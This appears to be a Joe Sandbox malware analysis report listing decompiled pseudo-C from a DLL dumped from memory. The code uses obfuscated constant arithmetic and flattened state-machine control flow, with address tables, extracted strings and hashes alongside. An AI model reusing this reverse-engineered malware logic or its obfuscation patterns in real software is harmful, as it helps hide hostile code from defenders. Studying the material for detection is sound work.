				 *(_t446 + 0xa0) =  *(_t446 + 0xa0) ^ 0x00004aa7;
				 *(_t446 + 0x80) = 0xb565;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) | 0xd87788ca;
				 *(_t446 + 0x80) =  *(_t446 + 0x80) ^ 0xd877c5fd;
				 *(_t446 + 0x38) = 0x6376;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xd60ebee2;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) + 0xdd50;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0x3a07644d;
				 *(_t446 + 0x38) =  *(_t446 + 0x38) ^ 0xec08a801;
				 *(_t446 + 0x3c) = 0x1f0d;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) | 0xe9d4bb8b;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0x531b6b57;
				 *(_t446 + 0x3c) =  *(_t446 + 0x3c) ^ 0xbacf9971;
				 *(_t446 + 0x5c) = 0x2ec0;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) << 0xc;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) >> 0xe;
				 *(_t446 + 0x5c) =  *(_t446 + 0x5c) ^ 0x00004eb6;
				 *(_t446 + 0x54) = 0xc421;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) + 0x4f00;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) >> 0xa;
				 *(_t446 + 0x54) =  *(_t446 + 0x54) ^ 0x0000676b;
				 *(_t446 + 0x2c) = 0x5f98;
				_t393 =  *(_t446 + 0x68);
				_t432 =  *(_t446 + 0x68);
				_t440 =  *(_t446 + 0x68);
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) / _t431;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) << 0xc;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) * 0x50;
				 *(_t446 + 0x2c) =  *(_t446 + 0x2c) ^ 0x15b80003;
				while(1) {
					L1:
					_t369 = 0x667bbe4;
					L2:
					while(_t395 != 0x333430e) {
						if(_t395 == _t369) {
							_t372 = E10016409( *(_t446 + 0x70),  *(_t446 + 0x90),  *(_t446 + 0x4c), _t432, _t395, _t440, _t446 + 0xc4,  *(_t446 + 0x94), _t395,  *((intOrPtr*)(_t446 + 0x84)),  *(_t446 + 0x24), _t393, _t395,  *(_t446 + 0x50));
							_t446 = _t446 + 0x30;
							__eflags = _t372;
							if(_t372 == 0) {
								_t373 =  *(_t446 + 0xb0);
							} else {
								_t442 = _t432;
								while(1) {
									__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
									if( *((intOrPtr*)(_t442 + 4)) != 4) {
										goto L19;
									}
									L18:
									_t335 = _t442 + 0xc; // 0x4bfe
									_t378 = E1000D867(_t444,  *(_t446 + 0x98), _t335,  *(_t446 + 0x38),  *(_t446 + 0x88),  *((intOrPtr*)(_t446 + 0x28)));
									_t446 = _t446 + 0x10;
									__eflags = _t378;
									if(_t378 == 0) {
										_t373 = 1;
										 *(_t446 + 0xb0) = 1;
									} else {
										goto L19;
									}
									L24:
									_t440 =  *(_t446 + 0x68);
									goto L25;
									L19:
									_t376 =  *_t442;
									__eflags = _t376;
									if(_t376 == 0) {
										_t373 =  *(_t446 + 0xb0);
									} else {
										_t442 = _t442 + _t376;
										__eflags =  *((intOrPtr*)(_t442 + 4)) - 4;
										if( *((intOrPtr*)(_t442 + 4)) != 4) {
											goto L19;
										}
									}
									goto L24;
								}
							}
							L25:
							__eflags = _t373;
							if(__eflags == 0) {
								_t369 = 0x667bbe4;
								_t395 = 0x667bbe4;
								continue;
							} else {
								_t374 =  *0x10021404; // 0x0
								E10017309( *(_t446 + 0x94),  *(_t446 + 0x4c),  *_t374);
								_t395 = 0x3007dbb6;
								goto L1;
							}
							L31:
						} else {
							if(_t395 == 0x133ba569) {
								E10008C0C( *((intOrPtr*)(_t446 + 0x30)), __eflags,  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0xac), _t446 + 0xc4);
								_t383 = E10001E13( *((intOrPtr*)(_t446 + 0x28)),  *(_t446 + 0x88),  *(_t446 + 0xb0),  *(_t446 + 0xa0), _t446 + 0xd0);
								_t444 = _t383;
								_t446 = _t446 + 0x18;
								_t395 = 0x1f405b52;
								 *((short*)(_t383 - 2)) = 0;
								while(1) {
									L1:
									_t369 = 0x667bbe4;
									goto L2;
								}
							} else {
								if(_t395 == 0x1614145d) {
									_t440 = 0x1000;
									_push(_t395);
									 *(_t446 + 0x6c) = 0x1000;
									_t432 = E100157E8(0x1000);
									_t369 = 0x667bbe4;
									__eflags = _t432;
									_t395 =  !=  ? 0x667bbe4 : 0x333430e;
									continue;
								} else {
									if(_t395 == 0x19391156) {
										_t395 = 0x133ba569;
										continue;
									} else {
										if(_t395 == 0x1f405b52) {
											_t389 = E1000492A( *(_t446 + 0x5c),  *(_t446 + 0x4c) | 0x00000006,  *(_t446 + 0x74),  *(_t446 + 0x5c),  *((intOrPtr*)(_t446 + 0xd0)), _t395, 1,  *(_t446 + 0x2c), _t395, _t446 + 0xc8, 0x2000000,  *(_t446 + 0x74),  *(_t446 + 0x68),  *((intOrPtr*)(_t446 + 0xa4)));
											_t393 = _t389;
											_t446 = _t446 + 0x30;
											__eflags = _t389 - 0xffffffff;
											if(__eflags != 0) {
												_t395 = 0x1614145d;
												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										} else {
											if(_t395 != 0x3007dbb6) {
												L29:
												__eflags = _t395 - 0x35dcba61;
												if(__eflags != 0) {
													continue;
												}
											} else {
												E100091CD( *((intOrPtr*)(_t446 + 0x84)),  *((intOrPtr*)(_t446 + 0xa4)),  *(_t446 + 0xa8), _t432,  *(_t446 + 0x80));
												_t446 = _t446 + 0xc;
												_t395 = 0x333430e;
												while(1) {
													L1:
													_t369 = 0x667bbe4;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L31;
					}
					E100078F0(_t393,  *(_t446 + 0x44),  *(_t446 + 0x44),  *((intOrPtr*)(_t446 + 0x60)),  *(_t446 + 0x54));
					_t446 = _t446 + 0xc;
					_t395 = 0x35dcba61;
					_t369 = 0x667bbe4;
					goto L29;
				}
			}

0x10016b4b
0x10016b58
0x10016b61
0x10016b6c
0x10016b71
0x10016b79
0x10016b7e
0x10016b86
0x10016b8e
0x10016b96
0x10016b9e
0x10016ba3
0x10016bab
0x10016bb3
0x10016bbb
0x10016bc2
0x10016bcb
0x10016bcf
0x10016bd4
0x10016bdc
0x10016be4
0x10016bef
0x10016bf2
0x10016bf6
0x10016bfe
0x10016c09
0x10016c14
0x10016c1f
0x10016c27
0x10016c2c
0x10016c34
0x10016c39
0x10016c41
0x10016c49
0x10016c51
0x10016c59
0x10016c64
0x10016c6f
0x10016c7a
0x10016c90
0x10016c97
0x10016ca2
0x10016caa
0x10016caf
0x10016cb7
0x10016cbf
0x10016ccb
0x10016cd0
0x10016cd6
0x10016cdb
0x10016ce3
0x10016ceb
0x10016cf6
0x10016d01
0x10016d0c
0x10016d14
0x10016d1c
0x10016d24
0x10016d29
0x10016d31
0x10016d3d
0x10016d40
0x10016d44
0x10016d4c
0x10016d5c
0x10016d61
0x10016d67
0x10016d6f
0x10016d77
0x10016d82
0x10016d8a
0x10016d95
0x10016da8
0x10016dab
0x10016db2
0x10016dbd
0x10016dc5
0x10016dca
0x10016dcf
0x10016dd7
0x10016ddf
0x10016de4
0x10016de9
0x10016df1
0x10016df9
0x10016e01
0x10016e09
0x10016e11
0x10016e1e
0x10016e28
0x10016e2c
0x10016e34
0x10016e3c
0x10016e44
0x10016e49
0x10016e51
0x10016e59
0x10016e5e
0x10016e66
0x10016e6e
0x10016e76
0x10016e7e
0x10016e83
0x10016e8b
0x10016e93
0x10016e9e
0x10016ea9
0x10016eb4
0x10016ebc
0x10016ec1
0x10016ec9
0x10016ece
0x10016ed6
0x10016ee1
0x10016eec
0x10016ef7
0x10016eff
0x10016f07
0x10016f0f
0x10016f14
0x10016f1c
0x10016f27
0x10016f2f
0x10016f3a
0x10016f42
0x10016f4a
0x10016f52
0x10016f5a
0x10016f62
0x10016f6a
0x10016f74
0x10016f86
0x10016f8b
0x10016f8f
0x10016f96
0x10016fa1
0x10016fac
0x10016fb4
0x10016fbf
0x10016fca
0x10016fd5
0x10016fe0
0x10016fe8
0x10016ff0
0x10016ff8
0x10017000
0x10017008
0x10017010
0x10017018
0x10017020
0x10017028
0x10017030
0x10017035
0x1001703a
0x10017042
0x1001704a
0x10017052
0x10017057
0x1001705f
0x1001706d
0x10017071
0x10017075
0x10017079
0x1001707d
0x10017087
0x1001708b
0x10017093
0x10017093
0x10017093
0x00000000
0x10017098
0x100170a6
0x10017232
0x10017237
0x1001723a
0x1001723c
0x10017284
0x1001723e
0x1001723e
0x10017240
0x10017240
0x10017244
0x00000000
0x00000000
0x10017246
0x1001724a
0x10017262
0x10017267
0x1001726a
0x1001726c
0x1001727a
0x1001727b
0x00000000
0x00000000
0x00000000
0x10017294
0x10017294
0x00000000
0x1001726e
0x1001726e
0x10017270
0x10017272
0x1001728d
0x10017274
0x10017274
0x10017240
0x10017244
0x00000000
0x00000000
0x10017244
0x00000000
0x10017272
0x10017240
0x10017298
0x10017298
0x1001729a
0x100172be
0x100172c3
0x00000000
0x1001729c
0x1001729c
0x100172ae
0x100172b4
0x00000000
0x100172b4
0x00000000
0x100170ac
0x100170b2
0x100171bf
0x100171e5
0x100171ea
0x100171ec
0x100171f1
0x100171f6
0x10017093
0x10017093
0x10017093
0x00000000
0x10017093
0x100170b8
0x100170be
0x10017179
0x10017185
0x10017188
0x10017191
0x10017193
0x10017199
0x100171a0
0x00000000
0x100170c4
0x100170ca
0x1001716b
0x00000000
0x100170d0
0x100170d6
0x1001714e
0x10017153
0x10017155
0x10017158
0x1001715b
0x10017161
0x10017093
0x10017093
0x10017093
0x00000000
0x10017093
0x10017093
0x100170d8
0x100170de
0x100172ee
0x100172ee
0x100172f4
0x00000000
0x00000000
0x100170e4
0x10017101
0x10017106
0x10017109
0x10017093
0x10017093
0x10017093
0x00000000
0x10017093
0x10017093
0x100170de
0x100170d6
0x100170ca
0x100170be
0x100170b2
0x100172fd
0x10017306
0x00000000
0x10017306
0x100172dc
0x100172e1
0x100172e4
0x100172e9
0x00000000
0x100172e9

Strings

O, xrefs: 10016D8A
[e, xrefs: 10016C41
), xrefs: 10016CEB
D, xrefs: 10016F5A
kg, xrefs: 10017057
ns, xrefs: 10016BDC
yw, xrefs: 10016C97
#7}, xrefs: 10016BC2
vc, xrefs: 10016FE0
'c, xrefs: 10016F42

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #7}$'c$)$D$[e$kg$ns$vc$yw$O
API String ID: 0-1013673946
Opcode ID: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
Instruction ID: f2670378fa826e8d31e23e03b62a8b8a54816961439a19b05cfa054466784345
Opcode Fuzzy Hash: 3dacd4352d9c33c1731b4215249d3e15c2e411b10bbaa018ca579d51b917f277
Instruction Fuzzy Hash: 250211711083809FE3A8CF21C58AA5FBBF1FBC5758F10891DE59A862A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1000C07D, Relevance: 12.8, Strings: 10, Instructions: 296
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000C07D(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _t249;
				intOrPtr _t273;
				intOrPtr _t275;
				void* _t292;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				intOrPtr* _t318;
				signed int _t319;
				intOrPtr* _t322;
				signed int* _t324;
				void* _t327;

				_push(_a8);
				_t322 = __edx;
				_t318 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t249);
				_v16 = 0x7669;
				_t324 =  &(( &_v120)[4]);
				_v16 = _v16 << 0xc;
				_v16 = _v16 ^ 0x0766ed4f;
				_t292 = 0;
				_v96 = 0xa3dc;
				_t319 = 0xc83da09;
				_v96 = _v96 << 0x10;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 ^ 0xd5d56a35;
				_v96 = _v96 ^ 0xd5c17d1d;
				_v88 = 0x57ea;
				_t294 = 0x44;
				_v88 = _v88 * 0x5e;
				_v88 = _v88 * 0x6d;
				_v88 = _v88 ^ 0xe3cf2272;
				_v88 = _v88 ^ 0xee71a60d;
				_v92 = 0x3245;
				_v92 = _v92 >> 9;
				_v92 = _v92 >> 7;
				_v92 = _v92 ^ 0xb732a7fa;
				_v92 = _v92 ^ 0xb732c7ae;
				_v40 = 0x3209;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 + 0xffff23da;
				_v40 = _v40 ^ 0xffff5649;
				_v44 = 0xfee;
				_v44 = _v44 * 0x3a;
				_v44 = _v44 + 0xffff023b;
				_v44 = _v44 ^ 0x00028194;
				_v20 = 0x6fe9;
				_v20 = _v20 ^ 0x83bafbf8;
				_v20 = _v20 ^ 0x83baebed;
				_v52 = 0x55fd;
				_v52 = _v52 >> 3;
				_v52 = _v52 / _t294;
				_v52 = _v52 ^ 0x00006fa3;
				_v56 = 0x7487;
				_t295 = 0x59;
				_v56 = _v56 / _t295;
				_v56 = _v56 + 0xca5f;
				_v56 = _v56 ^ 0x000097d2;
				_v60 = 0x67db;
				_v60 = _v60 + 0xffff6270;
				_v60 = _v60 ^ 0xc598274b;
				_v60 = _v60 ^ 0x3a67f21b;
				_v24 = 0x2803;
				_v24 = _v24 ^ 0x5736d0c5;
				_v24 = _v24 ^ 0x5736adce;
				_v28 = 0x6556;
				_v28 = _v28 ^ 0x16a4143a;
				_v28 = _v28 ^ 0x16a44fe2;
				_v64 = 0x2652;
				_v64 = _v64 << 1;
				_v64 = _v64 * 0x60;
				_v64 = _v64 ^ 0x001ca86e;
				_v116 = 0xa093;
				_v116 = _v116 | 0x704eabb3;
				_v116 = _v116 >> 0xe;
				_t296 = 0x26;
				_v116 = _v116 * 0x25;
				_v116 = _v116 ^ 0x0040c4bc;
				_v80 = 0xb33b;
				_v80 = _v80 >> 6;
				_v80 = _v80 >> 0xd;
				_v80 = _v80 ^ 0x000057d5;
				_v120 = 0xdf18;
				_v120 = _v120 | 0xefceebfd;
				_v120 = _v120 + 0xf560;
				_v120 = _v120 ^ 0xefcfb7f2;
				_v84 = 0x84bb;
				_v84 = _v84 ^ 0xda107d20;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x10f9b229;
				_v68 = 0xeff9;
				_v68 = _v68 / _t296;
				_v68 = _v68 >> 0x10;
				_v68 = _v68 ^ 0x00000bea;
				_v100 = 0x20d7;
				_v100 = _v100 >> 3;
				_t297 = 0x59;
				_v100 = _v100 * 0x53;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00004dbe;
				_v104 = 0x1634;
				_v104 = _v104 | 0xa08b3358;
				_v104 = _v104 * 0x64;
				_v104 = _v104 | 0xcfa784de;
				_v104 = _v104 ^ 0xffe789e4;
				_v108 = 0x3cd;
				_v108 = _v108 | 0xda478b90;
				_v108 = _v108 ^ 0x76068ebd;
				_v108 = _v108 * 0x60;
				_v108 = _v108 ^ 0x986216c6;
				_v112 = 0x5ea3;
				_v112 = _v112 * 0x50;
				_v112 = _v112 / _t297;
				_v112 = _v112 >> 6;
				_v112 = _v112 ^ 0x0000527a;
				_v32 = 0x8038;
				_v32 = _v32 + 0xffff845e;
				_v32 = _v32 ^ 0x00005668;
				_v72 = 0x3956;
				_v72 = _v72 ^ 0xc34d822a;
				_v72 = _v72 | 0x19b55510;
				_v72 = _v72 ^ 0xdbfdff55;
				_v36 = 0x9b67;
				_v36 = _v36 >> 5;
				_v36 = _v36 ^ 0x00004f8e;
				_v76 = 0x4339;
				_v76 = _v76 + 0xfffff79c;
				_v76 = _v76 + 0x9b18;
				_v76 = _v76 ^ 0x00009e95;
				while(1) {
					_t268 = _v48;
					while(1) {
						L2:
						_t327 = _t319 - 0x26339395;
						if(_t327 > 0) {
							break;
						}
						if(_t327 == 0) {
							_push(_t297);
							E10005B05(_v68,  *((intOrPtr*)( *0x100221b4 + 0x14)), _t297, _v8, _v100, _v104, _t297, _v108, _v112, _v32, _v12);
							_t324 =  &(_t324[0xa]);
							_t297 = 1;
							_t319 = 0x1081595e;
							_t292 =  !=  ? 1 : _t292;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0xc83da09) {
							_t319 = 0x357aa1fe;
							continue;
						}
						if(_t319 == 0x1081595e) {
							E1000D7B0(_v12);
							_t297 = _t297;
							_t319 = 0x172012b8;
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						if(_t319 == 0x16b83fff) {
							_t319 = 0x2f4aaa5a;
							continue;
						}
						if(_t319 == 0x172012b8) {
							if(_t292 == 0) {
								E100091CD(_v88, _v92, _v40,  *_t318, _v44);
							}
							L29:
							return _t292;
						}
						if(_t319 != 0x24206dd0) {
							L25:
							if(_t319 == 0x2ef876fe) {
								goto L29;
							}
							while(1) {
								_t268 = _v48;
								goto L2;
							}
						}
						E10001BB6(_t318 + 4, _v116, _t297,  *_t318, _v12, _v80,  *((intOrPtr*)( *0x100221b4)), _v120, _v84);
						_t324 =  &(_t324[8]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x15b23a37) + 0x1081595e;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 == 0x2f4aaa5a) {
						 *((intOrPtr*)(_t318 + 4)) = _a4 - 0x74;
						_t273 = E100157E8( *((intOrPtr*)(_t318 + 4)));
						 *_t318 = _t273;
						_t297 = _t297;
						if(_t273 == 0) {
							_t319 = 0x2ef876fe;
							goto L25;
						}
						_t275 =  *_t322;
						_t319 = 0x357ef6c4;
						_v8 = _t275;
						_v4 = _t275 + 0x74;
						_t268 = _a4 - 0x74;
						_v48 = _a4 - 0x74;
						goto L2;
					}
					if(_t319 == 0x357aa1fe) {
						if(_a4 < 0x74) {
							goto L29;
						}
						_t319 = 0x16b83fff;
						goto L2;
					}
					if(_t319 == 0x357ef6c4) {
						_t297 = _v20;
						E1000CB42(_t297, _v52, _v56, _t297,  &_v12,  *((intOrPtr*)( *0x100221b4 + 0x10)), _t297, _v60);
						_t324 =  &(_t324[6]);
						asm("sbb esi, esi");
						_t319 = (_t319 & 0x23df12f3) + 0x172012b8;
						while(1) {
							_t268 = _v48;
							goto L2;
						}
					}
					if(_t319 != 0x3aff25ab) {
						goto L25;
					}
					_t297 = _v24;
					E10009970(_t297, _v4, _v28,  *_t318, _t268, _v64);
					_t324 =  &(_t324[4]);
					_t319 = 0x24206dd0;
				}
			}

0x1000c084
0x1000c08b
0x1000c08d
0x1000c08f
0x1000c096
0x1000c097
0x1000c098
0x1000c09d
0x1000c0a8
0x1000c0ab
0x1000c0b2
0x1000c0ba
0x1000c0bc
0x1000c0c4
0x1000c0c9
0x1000c0ce
0x1000c0d3
0x1000c0db
0x1000c0e3
0x1000c0f2
0x1000c0f5
0x1000c0fe
0x1000c102
0x1000c10a
0x1000c112
0x1000c11a
0x1000c11f
0x1000c124
0x1000c12c
0x1000c134
0x1000c13c
0x1000c141
0x1000c149
0x1000c151
0x1000c15e
0x1000c162
0x1000c16a
0x1000c172
0x1000c17a
0x1000c182
0x1000c18a
0x1000c192
0x1000c19f
0x1000c1a3
0x1000c1ab
0x1000c1b7
0x1000c1ba
0x1000c1be
0x1000c1c6
0x1000c1ce
0x1000c1d6
0x1000c1de
0x1000c1e6
0x1000c1ee
0x1000c1f6
0x1000c1fe
0x1000c206
0x1000c20e
0x1000c216
0x1000c21e
0x1000c226
0x1000c22f
0x1000c233
0x1000c23b
0x1000c243
0x1000c24b
0x1000c259
0x1000c25c
0x1000c260
0x1000c268
0x1000c270
0x1000c275
0x1000c27a
0x1000c282
0x1000c28a
0x1000c292
0x1000c29a
0x1000c2a2
0x1000c2aa
0x1000c2b2
0x1000c2b7
0x1000c2bf
0x1000c2cf
0x1000c2d3
0x1000c2d8
0x1000c2e0
0x1000c2e8
0x1000c2f2
0x1000c2f3
0x1000c2f7
0x1000c2fc
0x1000c304
0x1000c30c
0x1000c319
0x1000c31d
0x1000c325
0x1000c32d
0x1000c335
0x1000c33d
0x1000c34a
0x1000c34e
0x1000c356
0x1000c363
0x1000c36d
0x1000c371
0x1000c376
0x1000c37e
0x1000c386
0x1000c38e
0x1000c396
0x1000c39e
0x1000c3a6
0x1000c3ae
0x1000c3b6
0x1000c3be
0x1000c3c3
0x1000c3cb
0x1000c3d3
0x1000c3db
0x1000c3e3
0x1000c3eb
0x1000c3eb
0x1000c3ef
0x1000c3ef
0x1000c3ef
0x1000c3f5
0x00000000
0x00000000
0x1000c3fb
0x1000c4af
0x1000c4e1
0x1000c4e8
0x1000c4eb
0x1000c4ec
0x1000c4f3
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c407
0x1000c4a5
0x00000000
0x1000c4a5
0x1000c413
0x1000c494
0x1000c49a
0x1000c49b
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c41b
0x1000c476
0x00000000
0x1000c476
0x1000c423
0x1000c605
0x1000c619
0x1000c61e
0x1000c624
0x1000c62a
0x1000c62a
0x1000c42f
0x1000c5f6
0x1000c5fc
0x00000000
0x00000000
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c459
0x1000c45e
0x1000c463
0x1000c46b
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c501
0x1000c5ae
0x1000c5bd
0x1000c5c2
0x1000c5c4
0x1000c5c7
0x1000c5f1
0x00000000
0x1000c5f1
0x1000c5c9
0x1000c5cc
0x1000c5d1
0x1000c5db
0x1000c5e5
0x1000c5e8
0x00000000
0x1000c5e8
0x1000c50d
0x1000c598
0x00000000
0x00000000
0x1000c59e
0x00000000
0x1000c59e
0x1000c519
0x1000c570
0x1000c577
0x1000c57c
0x1000c581
0x1000c589
0x1000c3eb
0x1000c3eb
0x00000000
0x1000c3eb
0x1000c3eb
0x1000c521
0x00000000
0x00000000
0x1000c539
0x1000c540
0x1000c545
0x1000c548
0x1000c548

Strings

iv, xrefs: 1000C09D
hV, xrefs: 1000C38E
o, xrefs: 1000C172
E2, xrefs: 1000C112
9C, xrefs: 1000C3CB
V9, xrefs: 1000C396
2, xrefs: 1000C134
R&, xrefs: 1000C21E
zR, xrefs: 1000C376
Ve, xrefs: 1000C206

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 2$9C$E2$R&$V9$Ve$hV$iv$zR$o
API String ID: 0-2458788695
Opcode ID: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
Instruction ID: b889abdc94fa4b4a1718a1273814a5ecfb06dcf28629aab6822f019f45cdcd48
Opcode Fuzzy Hash: cde8fb4cfcbe2daa5d61ed075c86a642f744566edfd9abd8c45c0297c1402669
Instruction Fuzzy Hash: 1AE1217240C3819FE358CF64C98A90BBBF0FB84794F60891DF595862A4D7B59A49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10015DAA, Relevance: 12.8, Strings: 10, Instructions: 290
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10015DAA(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				unsigned int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t312;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t330;
				void* _t335;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				intOrPtr _t365;
				void* _t366;
				signed int* _t368;
				void* _t376;

				_t368 =  &_v144;
				_v16 = 0x2f11e5;
				_v12 = 0x125d40;
				_t365 = 0;
				_t338 = __ecx;
				_v8 = 0;
				_t366 = 0x358f7696;
				_v4 = 0;
				_v132 = 0xdcb7;
				_t340 = 0x6f;
				_v132 = _v132 / _t340;
				_t341 = 0x48;
				_v132 = _v132 / _t341;
				_v132 = _v132 + 0xfffff0ee;
				_v132 = _v132 ^ 0xffff84cc;
				_v28 = 0x3643;
				_v28 = _v28 + 0xffff4038;
				_v28 = _v28 ^ 0xffff36c8;
				_v84 = 0x2397;
				_v84 = _v84 ^ 0x715e3b83;
				_v84 = _v84 + 0xb2b;
				_v84 = _v84 ^ 0x715e6259;
				_v92 = 0x7fa0;
				_t342 = 0xd;
				_v92 = _v92 * 0x4c;
				_v92 = _v92 | 0x3035aed7;
				_v92 = _v92 ^ 0x3035c4a3;
				_v32 = 0x3c7c;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0x078f867d;
				_v124 = 0xd3cb;
				_v124 = _v124 << 0xa;
				_v124 = _v124 / _t342;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x020946e5;
				_v68 = 0x8f72;
				_t343 = 0x68;
				_v68 = _v68 / _t343;
				_v68 = _v68 * 0x26;
				_v68 = _v68 ^ 0x00002cf4;
				_v76 = 0xb700;
				_v76 = _v76 >> 0xf;
				_v76 = _v76 | 0x3f1719c8;
				_v76 = _v76 ^ 0x3f176b52;
				_v80 = 0x2c59;
				_v80 = _v80 | 0xf2308069;
				_v80 = _v80 ^ 0x9e8457c3;
				_v80 = _v80 ^ 0x6cb4c9eb;
				_v128 = 0xbaba;
				_v128 = _v128 | 0x1d3dda76;
				_v128 = _v128 ^ 0x5e21119f;
				_v128 = _v128 + 0xffffe525;
				_v128 = _v128 ^ 0x431cc63a;
				_v72 = 0xdca3;
				_v72 = _v72 * 0x15;
				_v72 = _v72 * 0x47;
				_v72 = _v72 ^ 0x05054403;
				_v88 = 0x680b;
				_v88 = _v88 ^ 0xdb65b47e;
				_v88 = _v88 + 0xffff3c9f;
				_v88 = _v88 ^ 0xdb654b07;
				_v40 = 0xa6e8;
				_t344 = 0x51;
				_v40 = _v40 * 0x47;
				_v40 = _v40 ^ 0x002e2907;
				_v48 = 0xe244;
				_v48 = _v48 + 0xe070;
				_v48 = _v48 ^ 0x0001a9ff;
				_v52 = 0xb9c7;
				_v52 = _v52 >> 1;
				_v52 = _v52 ^ 0x000022fe;
				_v36 = 0xc27e;
				_v36 = _v36 * 0x12;
				_v36 = _v36 ^ 0x000dd66f;
				_v120 = 0xc6aa;
				_v120 = _v120 | 0x840c2d9c;
				_v120 = _v120 << 5;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x3beff1bc;
				_v64 = 0x26b9;
				_v64 = _v64 * 0x17;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x0000525e;
				_v136 = 0x331a;
				_v136 = _v136 ^ 0xe6942da9;
				_v136 = _v136 / _t344;
				_v136 = _v136 + 0x45e7;
				_v136 = _v136 ^ 0x02d904bd;
				_v60 = 0xefe2;
				_v60 = _v60 ^ 0xb768827f;
				_t345 = 0x5a;
				_v60 = _v60 / _t345;
				_v60 = _v60 ^ 0x0209f4de;
				_v44 = 0x996d;
				_v44 = _v44 + 0xeb77;
				_v44 = _v44 ^ 0x0001ce3e;
				_v140 = 0xaea2;
				_v140 = _v140 + 0xffff7943;
				_v140 = _v140 + 0xffff713c;
				_v140 = _v140 << 1;
				_v140 = _v140 ^ 0xffff0950;
				_v144 = 0xe8a6;
				_v144 = _v144 + 0xffff5365;
				_v144 = _v144 << 9;
				_v144 = _v144 + 0xffffbb33;
				_v144 = _v144 ^ 0x0077ca81;
				_v104 = 0x7543;
				_v104 = _v104 + 0xd62a;
				_v104 = _v104 | 0x34ced3cc;
				_v104 = _v104 ^ 0x34cfd1d4;
				_v96 = 0x479b;
				_v96 = _v96 >> 3;
				_v96 = _v96 * 0x1b;
				_v96 = _v96 ^ 0x0000f726;
				_v20 = 0xd19;
